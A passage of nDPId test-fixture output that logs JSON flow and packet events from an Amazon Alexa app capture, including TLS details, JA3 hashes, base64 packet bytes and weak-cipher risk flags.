{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088631,"flow_last_seen":1490976088631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1490976088631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088631,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NFtAAEAGEpSsECrYNF7ohrKOAbuEplS0AAAAAKAC\/\/9kqAAAAgQFtAQCCAoA9mDvAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} 
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088958,"flow_last_seen":1490976088958,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088958,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1490976088958,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088958,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFJAAEAGMp2sECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/FYwAAAgQFtAQCCAoA9mEPAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089173,"flow_last_seen":1490976089173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089173,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1490976089173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089173,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Al9AAEAGRJCsECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+yQAAAAgQFtAQCCAoA9mElAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089227,"flow_last_seen":1490976089227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089227,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1490976089227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089227,"pkt":"AMDKkaPvePiC0\/vCCABFAAA835BAAEAGZ16sECrYNF7ohrKSAbuabb66AAAAAKAC\/\/\/kmwAAAgQFtAQCCAoA9mEqAAAAAAEDAwg="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089239,"flow_last_seen":1490976089239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1490976089239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089239,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TPtAAEAG+fOsECrYNF7ohrKTAbvSFy3QAAAAAKAC\/\/892gAAAgQFtAQCCAoA9mErAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089426,"flow_last_seen":1490976089426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089426,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} 
+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe7VAAOcGJEU0XuiGrBAq2AG7spKfnILVmm2+u3ASH\/5AVQAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9UZAAOcGqrM0XuiGrBAq2AG7spCu8tJmAyB1XnASH\/7CGgAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjedAAOcGEhM0XuiGrBAq2ABQwds2rrGpGjBje3ASH\/5IDwAAAgQFtAEDAwY="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1490976090170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090170,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AmBAAEAGRI+sECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+x3AAAAgQFtAQCCAoA9mGJAAAAAAEDAwg="} 
